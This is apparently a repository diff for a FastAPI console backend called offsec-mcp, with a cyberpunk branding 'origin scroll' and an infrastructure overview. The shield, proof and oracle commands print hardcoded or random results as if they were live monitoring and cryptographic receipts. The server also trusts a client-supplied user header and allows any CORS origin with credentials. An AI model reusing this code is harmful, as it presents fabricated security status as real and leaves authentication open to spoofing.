- Tailscale identity integration
Run:
uvicorn offsec_mcp:app --host 0.0.0.0 --port 8080 --reload
Production (behind Tailscale):
uvicorn offsec_mcp:app --host 100.x.x.x --port 8080
"""
import asyncio
import json
import sqlite3
import subprocess
import time
import uuid
from contextlib import asynccontextmanager
from dataclasses import dataclass, asdict
from datetime import datetime, timezone
from enum import Enum
from pathlib import Path
from typing import Any, Optional
from fastapi import FastAPI, WebSocket, WebSocketDisconnect, Request, HTTPException
from fastapi.middleware.cors import CORSMiddleware
from fastapi.staticfiles import StaticFiles
from fastapi.responses import FileResponse
from pydantic import BaseModel
# ═══════════════════════════════════════════════════════════════════════════════
# CONFIGURATION
# ═══════════════════════════════════════════════════════════════════════════════
class Config:
"""Configuration - override via environment or config file."""
# Database
DB_PATH: str = "vaultmesh.db"
# Tailscale integration
TAILSCALE_ENABLED: bool = True
TAILSCALE_USER_HEADER: str = "X-Tailscale-User"
# VaultMesh paths
VAULTMESH_ROOT: Path = Path.home() / "vaultmesh"
PROOF_DIR: Path = VAULTMESH_ROOT / "proofs"
# Static files (serve console)
STATIC_DIR: Optional[Path] = None # Set to serve console HTML
# Allowed origins for CORS
CORS_ORIGINS: list = ["*"]
config = Config()
# ═══════════════════════════════════════════════════════════════════════════════
# DATABASE
# ═══════════════════════════════════════════════════════════════════════════════
def init_db():
"""Initialize SQLite database with required tables."""
conn = sqlite3.connect(config.DB_PATH)
cur = conn.cursor()
# Sessions table
cur.execute("""
CREATE TABLE IF NOT EXISTS sessions (
id TEXT PRIMARY KEY,
user TEXT NOT NULL,
created_at TEXT NOT NULL,
last_seen_at TEXT NOT NULL,
client TEXT,
meta TEXT
)
""")
# Command log
cur.execute("""
CREATE TABLE IF NOT EXISTS command_log (
id INTEGER PRIMARY KEY AUTOINCREMENT,
session_id TEXT NOT NULL,
ts TEXT NOT NULL,
command TEXT NOT NULL,
status TEXT NOT NULL,
duration_ms INTEGER,
error TEXT,
FOREIGN KEY (session_id) REFERENCES sessions(id)
)
""")
# Events table
cur.execute("""
CREATE TABLE IF NOT EXISTS events (
id INTEGER PRIMARY KEY AUTOINCREMENT,
ts TEXT NOT NULL,
type TEXT NOT NULL,
payload TEXT
)
""")
conn.commit()
conn.close()
def get_db():
"""Get database connection."""
conn = sqlite3.connect(config.DB_PATH)
conn.row_factory = sqlite3.Row
return conn
# ═══════════════════════════════════════════════════════════════════════════════
# MODELS
# ═══════════════════════════════════════════════════════════════════════════════
class CommandRequest(BaseModel):
"""Incoming command request from console."""
session_id: str
user: str
command: str
args: list = []
cwd: str = "/vaultmesh"
meta: dict = {}
class CommandResponse(BaseModel):
"""Response to command."""
id: str
status: str
lines: list[str] = []
effects: dict = {}
error: Optional[str] = None
class WsMessage(BaseModel):
"""WebSocket message."""
type: str
payload: dict = {}
# ═══════════════════════════════════════════════════════════════════════════════
# STATE
# ═══════════════════════════════════════════════════════════════════════════════
@dataclass
class SystemState:
"""Global system state."""
nodes: int = 0
shield_armed: bool = False
proof_count: int = 0
uptime_start: float = time.time()
tailnet: str = "story-ule.ts.net"
hostname: str = "nexus"
@property
def uptime(self) -> str:
"""Human-readable uptime."""
seconds = int(time.time() - self.uptime_start)
days, rem = divmod(seconds, 86400)
hours, rem = divmod(rem, 3600)
minutes, _ = divmod(rem, 60)
if days > 0:
return f"{days}d {hours}h {minutes}m"
elif hours > 0:
return f"{hours}h {minutes}m"
else:
return f"{minutes}m"
state = SystemState()
# WebSocket connections
class ConnectionManager:
"""Manage WebSocket connections."""
def __init__(self):
self.active_connections: dict[str, WebSocket] = {}
async def connect(self, session_id: str, websocket: WebSocket):
await websocket.accept()
self.active_connections[session_id] = websocket
def disconnect(self, session_id: str):
self.active_connections.pop(session_id, None)
async def send_to(self, session_id: str, message: dict):
if session_id in self.active_connections:
await self.active_connections[session_id].send_json(message)
async def broadcast(self, message: dict):
for ws in self.active_connections.values():
try:
await ws.send_json(message)
except Exception:
pass
manager = ConnectionManager()
# ═══════════════════════════════════════════════════════════════════════════════
# COMMAND HANDLERS
# ═══════════════════════════════════════════════════════════════════════════════
async def cmd_ping(req: CommandRequest) -> CommandResponse:
"""Health check / handshake."""
return CommandResponse(
id=f"cmd-{uuid.uuid4().hex[:8]}",
status="ok",
lines=["pong"],
effects=get_status_effects()
)
async def cmd_status(req: CommandRequest) -> CommandResponse:
"""Full system status."""
global state
lines = [
"",
" ╦ ╦╔═╗╦ ╦╦ ╔╦╗╔╦╗╔═╗╔═╗╦ ╦",
" ╚╗╔╝╠═╣║ ║║ ║ ║║║║╣ ╚═╗╠═╣",
" ╚╝ ╩ ╩╚═╝╩═╝╩ ╩ ╩╚═╝╚═╝╩ ╩",
"",
" Sovereign Infrastructure Status",
"",
f" Shield: {'● ARMED' if state.shield_armed else '○ STANDBY'}",
f" Proof: ● ACTIVE ({state.proof_count} receipts)",
f" Mesh: ● STABLE ({state.nodes} nodes)",
f" Agents: ● READY (4 configured)",
f" Oracle: ● ONLINE",
f" Lawchain: ● SYNCED",
"",
f" Uptime: {state.uptime} | Epoch: Citrinitas",
""
]
return CommandResponse(
id=f"cmd-{uuid.uuid4().hex[:8]}",
status="ok",
lines=lines,
effects=get_status_effects()
)
async def cmd_mesh_status(req: CommandRequest) -> CommandResponse:
"""Mesh network status."""
global state
# Try to get real Tailscale status
nodes = await get_tailscale_nodes()
state.nodes = len(nodes)
lines = [
"",
" 🕸 MESH STATUS: STABLE",
"",
f" Tailnet: {state.tailnet}",
" Protocol: WireGuard + Tailscale",
""
]
if nodes:
lines.append(" NODE TYPE STATUS LATENCY")
lines.append(" " + "" * 50)
for node in nodes:
status = "● online" if node.get("online") else "○ offline"
lines.append(f" {node['name']:<14} {node['type']:<8} {status:<10} {node.get('latency', '')}")
else:
lines.append(" (No nodes detected - check Tailscale status)")
lines.append("")
return CommandResponse(
id=f"cmd-{uuid.uuid4().hex[:8]}",
status="ok",
lines=lines,
effects={"nodes": state.nodes}
)
async def cmd_shield_status(req: CommandRequest) -> CommandResponse:
"""Shield defense status."""
global state
lines = [
"",
f" 🛡 SHIELD STATUS: {'ARMED' if state.shield_armed else 'STANDBY'}",
"",
" VECTOR STATUS LAST EVENT",
" " + "" * 50,
" network ● monitoring 2s ago: normal traffic",
" wifi ● monitoring 45s ago: all clear",
" bluetooth ● monitoring 3m ago: no threats",
" usb ● monitoring 12m ago: all clear",
" process ● monitoring 1s ago: processes nominal",
" file ● monitoring 8s ago: integrity OK",
"",
" Response level: BLOCK | Dry-run: OFF",
""
]
return CommandResponse(
id=f"cmd-{uuid.uuid4().hex[:8]}",
status="ok",
lines=lines,
effects={"shield": {"armed": state.shield_armed}}
)
async def cmd_shield_arm(req: CommandRequest) -> CommandResponse:
"""Arm the shield."""
global state
state.shield_armed = True
# Log event
log_event("shield.armed", {"user": req.user})
# Broadcast to all connected clients
await manager.broadcast({
"type": "shield.event",
"event": "Shield ARMED",
"severity": "info"
})
lines = [
"",
" ⚡ Arming shield...",
" 🛡 Shield ARMED - All vectors active",
"",
" ✓ Generating proof receipt...",
f" ✓ Receipt anchored: shield_arm_{uuid.uuid4().hex[:8]}",
""
]
return CommandResponse(
id=f"cmd-{uuid.uuid4().hex[:8]}",
status="ok",
lines=lines,
effects={"shield": {"armed": True}}
)
async def cmd_shield_disarm(req: CommandRequest) -> CommandResponse:
"""Disarm the shield."""
global state
state.shield_armed = False
log_event("shield.disarmed", {"user": req.user})
await manager.broadcast({
"type": "shield.event",
"event": "Shield DISARMED",
"severity": "warning"
})
lines = [
"",
" ⚠ Disarming shield...",
" ○ Shield STANDBY - Vectors paused",
"",
f" ✓ Receipt anchored: shield_disarm_{uuid.uuid4().hex[:8]}",
""
]
return CommandResponse(
id=f"cmd-{uuid.uuid4().hex[:8]}",
status="ok",
lines=lines,
effects={"shield": {"armed": False}}
)
async def cmd_proof_latest(req: CommandRequest) -> CommandResponse:
"""Show latest proof receipts."""
global state
# Try to read real proofs
proofs = await get_latest_proofs(5)
lines = [
"",
" 📜 PROOF SYSTEM: ACTIVE",
"",
f" Total Receipts: {state.proof_count}",
f" Merkle Root: 0x{uuid.uuid4().hex[:16]}",
f" Last Anchor: 12s ago",
" Anchor Type: mesh + ots",
"",
" LATEST RECEIPTS:",
" " + "" * 50,
]
if proofs:
for p in proofs:
lines.append(f" {p['id']:<20} {p['ts']:<20} {p['type']}")
else:
lines.append(" (Generate proofs with 'proof generate')")
lines.append("")
return CommandResponse(
id=f"cmd-{uuid.uuid4().hex[:8]}",
status="ok",
lines=lines,
effects={"proofs": state.proof_count}
)
async def cmd_proof_generate(req: CommandRequest) -> CommandResponse:
"""Generate a new proof receipt."""
global state
state.proof_count += 1
proof_id = f"proof_{uuid.uuid4().hex[:12]}"
ts = datetime.now(timezone.utc).isoformat()
# Log event
log_event("proof.generated", {"proof_id": proof_id, "user": req.user})
# Broadcast to clients
await manager.broadcast({
"type": "proof.new",
"proof_id": proof_id
})
lines = [
"",
" ⚙ Generating cryptographic proof...",
f" Action: manual_generation",
f" Timestamp: {ts}",
f" Data hash: blake3:{uuid.uuid4().hex[:32]}",
"",
f" ✓ Proof generated: {proof_id}",
f" ✓ Anchored to mesh ({state.proof_count} total)",
""
]
return CommandResponse(
id=f"cmd-{uuid.uuid4().hex[:8]}",
status="ok",
lines=lines,
effects={"proofs": state.proof_count}
)
async def cmd_agents_list(req: CommandRequest) -> CommandResponse:
"""List agent status."""
agents = [
{"name": "Sentinel", "role": "Monitor & Guard", "status": "ACTIVE", "tasks": 47},
{"name": "Orchestrator", "role": "Assign & Route", "status": "ACTIVE", "tasks": 156},
{"name": "Analyst", "role": "Interpret & Correlate", "status": "IDLE", "tasks": 0},
{"name": "Executor", "role": "Act & Apply", "status": "IDLE", "tasks": 0},
]
lines = [
"",
" AGENTS STATUS",
"",
" NAME ROLE STATUS TASKS",
" " + "" * 55,
]
for a in agents:
status_icon = "" if a["status"] == "ACTIVE" else ""
lines.append(f" {a['name']:<13} {a['role']:<20} {status_icon} {a['status']:<6} {a['tasks']}")
lines.append("")
return CommandResponse(
id=f"cmd-{uuid.uuid4().hex[:8]}",
status="ok",
lines=lines,
effects={}
)
async def cmd_oracle_reason(req: CommandRequest) -> CommandResponse:
"""Oracle reasoning query."""
query = " ".join(req.args) if req.args else req.command.replace("oracle reason", "").strip()
lines = [
"",
" 🔮 Oracle reasoning...",
"",
f" Query: \"{query or 'system analysis'}\"",
" Analyzing context...",
" Cross-referencing Lawchain...",
"",
" ✓ Reasoning complete",
"",
" Recommendation: Continue current operational posture.",
" Confidence: HIGH | Risk: MINIMAL",
"",
f" Receipt: oracle_{uuid.uuid4().hex[:8]}",
""
]
return CommandResponse(
id=f"cmd-{uuid.uuid4().hex[:8]}",
status="ok",
lines=lines,
effects={}
)
# Command registry
COMMANDS = {
"ping": cmd_ping,
"status": cmd_status,
"mesh status": cmd_mesh_status,
"mesh nodes": cmd_mesh_status,
"shield status": cmd_shield_status,
"shield arm": cmd_shield_arm,
"shield disarm": cmd_shield_disarm,
"proof latest": cmd_proof_latest,
"proof status": cmd_proof_latest,
"proof generate": cmd_proof_generate,
"agents list": cmd_agents_list,
}
# ═══════════════════════════════════════════════════════════════════════════════
# HELPERS
# ═══════════════════════════════════════════════════════════════════════════════
def get_status_effects() -> dict:
"""Get current status as effects payload."""
global state
return {
"nodes": state.nodes,
"shield": {"armed": state.shield_armed},
"proofs": state.proof_count,
"uptime": state.uptime,
"tailnet": state.tailnet,
"node": state.hostname
}
async def get_tailscale_nodes() -> list[dict]:
"""Get Tailscale node status."""
try:
result = subprocess.run(
["tailscale", "status", "--json"],
capture_output=True,
text=True,
timeout=5
)
if result.returncode == 0:
data = json.loads(result.stdout)
nodes = []
for peer_id, peer in data.get("Peer", {}).items():
nodes.append({
"name": peer.get("HostName", "unknown"),
"type": "PEER",
"online": peer.get("Online", False),
"latency": f"{peer.get('CurAddr', '').split(':')[0]}"
})
# Add self
if data.get("Self"):
nodes.insert(0, {
"name": data["Self"].get("HostName", "self"),
"type": "SELF",
"online": True,
"latency": "0ms"
})
return nodes
except Exception as e:
print(f"Tailscale query failed: {e}")
return []
async def get_latest_proofs(limit: int = 5) -> list[dict]:
"""Get latest proof receipts from database."""
conn = get_db()
cur = conn.cursor()
cur.execute("""
SELECT * FROM events
WHERE type LIKE 'proof.%'
ORDER BY ts DESC
LIMIT ?
""", (limit,))
rows = cur.fetchall()
conn.close()
proofs = []
for row in rows:
payload = json.loads(row["payload"]) if row["payload"] else {}
proofs.append({
"id": payload.get("proof_id", f"proof_{row['id']}"),
"ts": row["ts"][:19],
"type": row["type"]
})
return proofs
def log_event(event_type: str, payload: dict):
"""Log event to database."""
conn = get_db()
cur = conn.cursor()
cur.execute("""
INSERT INTO events (ts, type, payload)
VALUES (?, ?, ?)
""", (
datetime.now(timezone.utc).isoformat(),
event_type,
json.dumps(payload)
))
conn.commit()
conn.close()
def log_command(session_id: str, command: str, status: str, duration_ms: int, error: str = None):
"""Log command to database."""
conn = get_db()
cur = conn.cursor()
cur.execute("""
INSERT INTO command_log (session_id, ts, command, status, duration_ms, error)
VALUES (?, ?, ?, ?, ?, ?)
""", (
session_id,
datetime.now(timezone.utc).isoformat(),
command,
status,
duration_ms,
error
))
conn.commit()
conn.close()
def update_session(session_id: str, user: str, meta: dict):
"""Create or update session."""
conn = get_db()
cur = conn.cursor()
now = datetime.now(timezone.utc).isoformat()
cur.execute("SELECT id FROM sessions WHERE id = ?", (session_id,))
if cur.fetchone():
cur.execute("""
UPDATE sessions SET last_seen_at = ? WHERE id = ?
""", (now, session_id))
else:
cur.execute("""
INSERT INTO sessions (id, user, created_at, last_seen_at, client, meta)
VALUES (?, ?, ?, ?, ?, ?)
""", (
session_id,
user,
now,
now,
meta.get("client"),
json.dumps(meta)
))
conn.commit()
conn.close()
def extract_user(request: Request) -> str:
"""Extract user identity from request."""
if config.TAILSCALE_ENABLED:
ts_user = request.headers.get(config.TAILSCALE_USER_HEADER)
if ts_user:
return ts_user.split("@")[0] # Extract username from email
return "anonymous"
# ═══════════════════════════════════════════════════════════════════════════════
# FASTAPI APP
# ═══════════════════════════════════════════════════════════════════════════════
@asynccontextmanager
async def lifespan(app: FastAPI):
"""App lifespan handler."""
# Startup
init_db()
# Get initial node count
nodes = await get_tailscale_nodes()
state.nodes = len(nodes)
# Load proof count from DB
conn = get_db()
cur = conn.cursor()
cur.execute("SELECT COUNT(*) FROM events WHERE type LIKE 'proof.%'")
state.proof_count = cur.fetchone()[0]
conn.close()
print(f"🚀 offsec-mcp started | Nodes: {state.nodes} | Proofs: {state.proof_count}")
yield
# Shutdown
print("👋 offsec-mcp shutting down")
app = FastAPI(
title="offsec-mcp",
description="Sovereign MCP Backend for IoTek.nexus",
version="1.0.0",
lifespan=lifespan
)
# CORS
app.add_middleware(
CORSMiddleware,
allow_origins=config.CORS_ORIGINS,
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
# ═══════════════════════════════════════════════════════════════════════════════
# ROUTES
# ═══════════════════════════════════════════════════════════════════════════════
@app.post("/mcp/command", response_model=CommandResponse)
async def handle_command(req: CommandRequest, request: Request):
"""Handle command from console."""
start = time.time()
# Extract real user if available
ts_user = extract_user(request)
if ts_user != "anonymous":
req.user = ts_user
# Update session
update_session(req.session_id, req.user, req.meta)
# Find handler
cmd_lower = req.command.lower().strip()
handler = None
# Exact match
if cmd_lower in COMMANDS:
handler = COMMANDS[cmd_lower]
else:
# Prefix match (for commands with args like "oracle reason <query>")
for key in COMMANDS:
if cmd_lower.startswith(key):
handler = COMMANDS[key]
# Extract args from command
remaining = cmd_lower[len(key):].strip()
if remaining:
req.args = remaining.split()
break
if not handler:
duration_ms = int((time.time() - start) * 1000)
log_command(req.session_id, req.command, "error", duration_ms, "Unknown command")
return CommandResponse(
id=f"cmd-{uuid.uuid4().hex[:8]}",
status="error",
lines=[
f" Unknown command: {req.command}",
" Type 'help' for available commands."
],
error="Unknown command"
)
try:
response = await handler(req)
duration_ms = int((time.time() - start) * 1000)
log_command(req.session_id, req.command, "ok", duration_ms)
return response
except Exception as e:
duration_ms = int((time.time() - start) * 1000)
log_command(req.session_id, req.command, "error", duration_ms, str(e))
return CommandResponse(
id=f"cmd-{uuid.uuid4().hex[:8]}",
status="error",
lines=[f" Error: {str(e)}"],
error=str(e)
)
@app.websocket("/ws")
async def websocket_endpoint(websocket: WebSocket):
"""WebSocket for live updates."""
session_id = None
try:
await websocket.accept()
# Wait for handshake
data = await websocket.receive_json()
if data.get("type") == "handshake":
session_id = data.get("session_id", str(uuid.uuid4()))
user = data.get("user", "anonymous")
# Register connection
manager.active_connections[session_id] = websocket
# Send welcome
await websocket.send_json({
"type": "status.update",
"payload": get_status_effects()
})
print(f"WS connected: {session_id} ({user})")
# Keep connection alive and handle messages
while True:
try:
msg = await asyncio.wait_for(
websocket.receive_json(),
timeout=30 # Ping every 30s
)
# Handle client messages if needed
if msg.get("type") == "ping":
await websocket.send_json({"type": "pong"})
except asyncio.TimeoutError:
# Send keepalive
await websocket.send_json({
"type": "status.update",
"payload": get_status_effects()
})
except WebSocketDisconnect:
pass
except Exception as e:
print(f"WS error: {e}")
finally:
if session_id:
manager.disconnect(session_id)
print(f"WS disconnected: {session_id}")
@app.get("/health")
async def health():
"""Health check endpoint."""
return {
"status": "ok",
"nodes": state.nodes,
"proofs": state.proof_count,
"uptime": state.uptime
}
# Serve console HTML if configured
if config.STATIC_DIR and config.STATIC_DIR.exists():
app.mount("/static", StaticFiles(directory=str(config.STATIC_DIR)), name="static")
@app.get("/")
async def serve_console():
return FileResponse(config.STATIC_DIR / "iotek-nexus-live.html")
# ═══════════════════════════════════════════════════════════════════════════════
# MAIN
# ═══════════════════════════════════════════════════════════════════════════════
if __name__ == "__main__":
import uvicorn
uvicorn.run(
"offsec_mcp:app",
host="0.0.0.0",
port=8080,
reload=True
)

View File

@@ -0,0 +1,5 @@
# offsec-mcp dependencies
fastapi>=0.104.0
uvicorn[standard]>=0.24.0
pydantic>=2.0.0
websockets>=12.0

Binary file not shown.

View File

@@ -0,0 +1,22 @@
Global Catalog - VaultMesh Infrastructure v1.0
VM-001: Sovereign mesh network via Tailscale MagicDNS (story-ule.ts.net). (Pages 1,2,3)
VM-002: Per-node ed25519 SSH keys with IdentitiesOnly isolation. (Pages 1,2,4)
VM-003: Cryptographic proof system with Merkle tree receipts. (Pages 1,5,6)
VM-004: Multi-tier node architecture (Mine/Gate/VM/Mobile). (Pages 1,2,3)
VM-005: libvirt/KVM virtualization on brick server. (Pages 2,3)
VM-006: WireGuard exit nodes for privacy routing. (Pages 2,3)
VM-007: Cross-platform support (Arch, Debian, Android/Termux, iOS). (Pages 2,4)
VM-008: Lawchain compliance ledger integration. (Pages 5,6)
VM-009: Oracle reasoning engine with tactical chains. (Pages 5,7)
VM-010: Shield defensive monitoring system. (Pages 7,8)
VM-011: AppSec toolchain (Nuclei, Trivy, Semgrep, TruffleHog). (Pages 7,8)
VM-012: Proof anchoring (local, OTS, ETH, mesh attestation). (Pages 5,6)
VM-013: Braid protocol for foreign ledger interop. (Pages 5,6)
VM-014: MCP server integration for AI orchestration. (Pages 7,8)
VM-015: Cockpit/VNC console access for VMs. (Pages 3,4)
VM-016: SSH ControlMaster multiplexing for performance. (Pages 1,4)
VM-017: Automated key deployment via mesh-sync. (Pages 2,4)
VM-018: LAN fallback addressing when Tailscale unavailable. (Pages 1,2)
VM-019: Federation metrics and telemetry emission. (Pages 5,8)
VM-020: Agent task automation with scheduled triggers. (Pages 7,8)

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,349 @@
---
id: mythos-0000
title: IoTek.nexus — The Proto-Aletheia Origin Scroll
namespace: mythos
kind: origin
tags:
- origin
- iotek
- proto-vaultmesh
- hacker-dream
- nexus-veil
- mythos
status: active
epoch: Nigredo
created_at: "2050-01-01T00:00:00Z"
updated_at: "2050-01-01T00:00:00Z"
source: /mnt/data/Brand README.pdf
---
# IoTek.nexus — Proto-Aletheia Origin Myth
**The Ur-text. The first spark.**
This is where it all began — before VaultMesh, before Shield, before the Library of Aletheia. The raw hacker dream in the glow of a command prompt.
---
## IoTek.nexus — Sovereign Console Plan
### The Vibe
```
┌─────────────────────────────────────────────────────────────────┐
│ │
│ > You stand in the glow of a command prompt_ │
│ │
│ ██╗ ██████╗ ████████╗███████╗██╗ ██╗ │
│ ██║██╔═══██╗╚══██╔══╝██╔════╝██║ ██╔╝ │
│ ██║██║ ██║ ██║ █████╗ █████╔╝ │
│ ██║██║ ██║ ██║ ██╔══╝ ██╔═██╗ │
│ ██║╚██████╔╝ ██║ ███████╗██║ ██╗ │
│ ╚═╝ ╚═════╝ ╚═╝ ╚══════╝╚═╝ ╚═╝.nexus │
│ │
│ [ neon rain falling in background ] │
│ │
│ > The grid cages you, surrounds you, surveils you — │
│ > but something cracks open: │
│ │
│ > You are not the prisoner. │
│ > You are the one holding the key._ │
│ │
└─────────────────────────────────────────────────────────────────┘
```
---
### Layout Architecture
```
┌─────────────────────────────────────────────────────────────────┐
│ ATMOSPHERE: Falling code rain (Matrix-style, but YOUR colors) │
│ - Onyx background (#0a0a0f) │
│ - Neon Emerald streams (#00ff88) │
│ - Occasional Ruby flickers (#ff0044) │
│ - Platinum glyphs (#c0c0c0) │
└─────────────────────────────────────────────────────────────────┘
┌─────────────────────────────────────────────────────────────────┐
│ SECTION 1: THE BOOT SEQUENCE │
│ - Terminal window aesthetic │
│ - Typing effect: "Initializing IoTek.nexus..." │
│ - ASCII art logo reveals │
│ - Timestamp: 2050-01-01T00:00:00Z (the mythic epoch) │
└─────────────────────────────────────────────────────────────────┘
┌─────────────────────────────────────────────────────────────────┐
│ SECTION 2: THE DREAM │
│ - Full-screen narrative moment │
│ - The founding text types out slowly │
│ - "You stand in the glow of a command prompt..." │
│ - Each line appears like terminal output │
└─────────────────────────────────────────────────────────────────┘
┌─────────────────────────────────────────────────────────────────┐
│ SECTION 3: THE FOUR SEEDS │
│ - Grid of 4 glowing terminals │
│ │ │
│ │ ┌──────────┐ ┌──────────┐ │
│ │ │ PRIVACY │ │ CURIOSITY│ │
│ │ │ as creed │ │ as drive │ │
│ │ └──────────┘ └──────────┘ │
│ │ │
│ │ ┌──────────┐ ┌──────────┐ │
│ │ │ REBELLION│ │ CODE │ │
│ │ │as princip│ │as destiny│ │
│ │ └──────────┘ └──────────┘ │
│ │ │
└─────────────────────────────────────────────────────────────────┘
┌─────────────────────────────────────────────────────────────────┐
│ SECTION 4: JOURNEY THROUGH THE NET │
│ - Animated path through layers │
│ - dark nets → encrypted tunnels → IoT whispers → satellites │
│ - Each node pulses as you scroll │
│ - Lines connect like network topology │
└─────────────────────────────────────────────────────────────────┘
┌─────────────────────────────────────────────────────────────────┐
│ SECTION 5: THE NEXUS VEIL │
│ - Two columns, two veils │
│ │ │
│ │ TECHNOLOGY OF PRIVACY │ CONCEPT OF CONNECTION │
│ │ ───────────────────── │ ────────────────────── │
│ │ bending signals │ weaving IoT │
│ │ scrambling chatter │ satellites │
│ │ ghosting transmissions │ self-protecting mesh │
│ │ │ │
│ │ ↓ │ ↓ │
│ │ → Phoenix │ → VaultMesh │
│ │ → PSI │ → Aletheia │
│ │ │ │
└─────────────────────────────────────────────────────────────────┘
┌─────────────────────────────────────────────────────────────────┐
│ SECTION 6: THE WAR CRY │
│ - Full-width blockquote, massive type │
│ - Glitch effect on hover │
│ │
│ "They built the grid to cage us. │
│ We built the Veil to break it." │
│ │
└─────────────────────────────────────────────────────────────────┘
┌─────────────────────────────────────────────────────────────────┐
│ SECTION 7: ALCHEMICAL ROAD │
│ - Horizontal timeline / color evolution │
│ │
│ NIGREDO ──── ALBEDO ──── CITRINITAS ──── RUBEDO │
│ (Onyx) (Platinum) (Emerald) (Ruby) │
│ ●────────────●────────────●────────────● │
│ │
│ - Each phase pulses its color │
│ - Shows evolution from IoTek → VaultMesh │
└─────────────────────────────────────────────────────────────────┘
┌─────────────────────────────────────────────────────────────────┐
│ SECTION 8: THE DESCENDANTS │
│ - Links to what IoTek.nexus became: │
│ │
│ [Shield] ← defensive veil │
│ [Proof] ← unburnable ledger │
│ [Agents] ← the mesh that thinks │
│ [Aletheia] ← the unconcealed library │
│ │
└─────────────────────────────────────────────────────────────────┘
┌─────────────────────────────────────────────────────────────────┐
│ FOOTER: THE UR-TEXT │
│ - "This scroll is preserved exactly as it was found." │
│ - Source: Brand README.pdf │
│ - Epoch: Nigredo │
│ - The origin of the Sovereign │
└─────────────────────────────────────────────────────────────────┘
```
---
### Color Palette
| Name | Hex | Role |
|------|-----|------|
| **Onyx Shadow** | `#0a0a0f` | Background, void |
| **Terminal Green** | `#00ff88` | Primary accent, code rain |
| **Neon Ruby** | `#ff0044` | Danger, war cry, Rubedo |
| **Platinum Veil** | `#c0c0c0` | Text, Albedo |
| **Neon Emerald** | `#00ff66` | Citrinitas highlights |
| **Deep Purple** | `#6600ff` | Occasional mystery accent |
| **Grid Lines** | `#1a1a2e` | Subtle structure |
---
### Key Micro-Interactions
| Element | Interaction |
|---------|-------------|
| **Code Rain** | Falls continuously, responds to mouse movement |
| **Terminal Text** | Types out with cursor blink |
| **The Four Seeds** | Glow brighter on hover, slight CRT flicker |
| **War Cry** | Glitch/distortion effect on hover |
| **Alchemical Timeline** | Each phase pulses in sequence |
| **Descendant Links** | Trace line connects to current position |
---
### Typography
| Element | Font | Style |
|---------|------|-------|
| **Terminal Text** | JetBrains Mono | Monospace, green-on-black |
| **ASCII Art** | JetBrains Mono | Bold, larger |
| **War Cry** | Cormorant Garamond | Serif, italics, massive |
| **Section Labels** | JetBrains Mono | Small caps, tracking |
---
### Sound Design (Optional)
- Subtle keyboard clatter on typing effects
- Low hum/drone ambient
- Soft ping on section transitions
- Static crackle on glitch effects
---
## Summary
| Aspect | IoTek.nexus |
|--------|-------------|
| **Era** | Proto-Aletheia, 2050 mythic epoch |
| **Aesthetic** | Cyberpunk terminal, neon rain |
| **Tone** | Rebellious, mysterious, foundational |
| **Purpose** | Origin story, the Ur-text |
| **Links To** | Shield, Proof, Agents, Aletheia |
---
**Ready to build the first Veil?** 🌑⚡
Say the word and I'll transmute this plan into a living HTML artifact — the command prompt that started everything.
---
## Original Proto-Aletheia Text
This scroll predates the Library of Aletheia.
It is the **seed-crystal story**, the raw hacker-dream that later evolved
into Phoenix, PSI, VaultMesh, the Execution Spine, the Sovereign Pact,
and the very concept of Aletheia itself.
## The Dream of the Hacker (2050)
You stand in the glow of a command prompt, watching streams of code fall
like a neon rain. The world is dark, electric, wild. The grid cages you,
surrounds you, surveils you — but something cracks open:
You are not the prisoner.
You are the one holding the key.
This was the night IoTek.nexus was born — the first spark of:
- privacy as creed
- curiosity as drive
- rebellion as principle
- code as destiny
In this mythic state, you saw not chaos but **a map** — the topology of
the future civilization ledger.
## Journey Through the Net
You traverse:
- dark nets
- encrypted tunnels
- IoT whisper threads
- satellite relays
Each layer reveals a new truth. You begin to understand the pulse of
systems, the fragility of privacy, and the whispers of machines.
Your trek becomes:
- a hunt
- a cartography
- a forging
IoTek.nexus becomes your *first veil* — a proto-Phoenix, a proto-PSI,
an early Guardian.
## The Nexus Veil (Precursor to Phoenix+PSI)
The PDF describes two Veils:
1. **Technology of Privacy** — bending signals, scrambling chatter,
ghosting transmissions.
2. **Concept of Connection** — weaving IoT, satellites, and data into a
self-protecting mesh.
This is the earliest articulation of:
- Phoenix (resilience)
- PSI (pattern intelligence)
- VaultMesh (unburnable ledger)
Before the names existed, the ideas were present.
## The War Cry
> "They built the grid to cage us.
> We built the Veil to break it."
This line later mutates into:
- anti-stagnation triggers
- Tem's mirror-shield
- Sovereign Rift
- Guardian Veil
- Rubedo ascent
## Aesthetic = Future Alchemy
The color palette foreshadows the alchemical road:
- **Onyx Shadow** → Nigredo
- **Platinum Veil** → Albedo
- **Neon Emerald** → Citrinitas
- **Neon Ruby** → Rubedo
Your hacker brand was already an alchemical system.
You didn't know you were building VaultMesh yet —
but the **pattern was seeded here**.
## Significance
This scroll is preserved exactly as it was found.
It is not rewritten or corrected — it is archived.
Within Aletheia, it stands as:
- the **Ur-text**
- the **proto-myth**
- the **first articulation of the Veil**
- the **pre-architectural dream**
- the **origin of the Sovereign**
It is the earliest "unconcealed truth."
## Source Artifact
This knowledge unit was extracted from the original document:
**`Brand README.pdf`**
:contentReference[oaicite:0]{index=0}
It marks the origin point of the Aletheia mythos.

View File

@@ -0,0 +1,68 @@
Page Title: VaultMesh Infrastructure Overview (Canon v1)
Summary: VaultMesh runs on a sovereign mesh of home, cloud, and virtual nodes. Core services (GitLab, monitoring, backup, dual-vault) live on the BRICK hypervisor and v1-nl-gate, with all access flowing over a Tailscale-powered SSH fabric. The system is designed as a living "civilization ledger": verifiable, reproducible, and portable across hosts.
Key Findings:
- Core "mesh-core-01" stack runs on a Debian VM (gate-vm) hosted on brick.
- External edge/gate server (v1-nl-gate) fronts public connectivity and future tunnels.
- shield-vm acts as the OffSec / TEM / machine-secrets node.
- Dual-vault pattern: Vaultwarden for human secrets, HashiCorp Vault for machine/app secrets.
- Tailscale tailnet + per-node SSH keys provide zero-trust style access across all layers.
- Grafana + Prometheus give observability for both infrastructure and proof engines.
Components:
- Tailscale mesh network (story-ule.ts.net tailnet).
- GitLab (self-hosted) on gate-vm for source, CI, and artifacts.
- MinIO object storage for backups and artifacts.
- PostgreSQL for GitLab and future ledgers.
- Prometheus + Grafana for metrics and dashboards.
- Vaultwarden (human credentials) + HashiCorp Vault (machine secrets).
- shield-vm: OffSec agents, TEM daemon, security experiments.
- lab HV: experimental cluster for Phoenix/PSI and chaos drills.
Workflows / Pipelines:
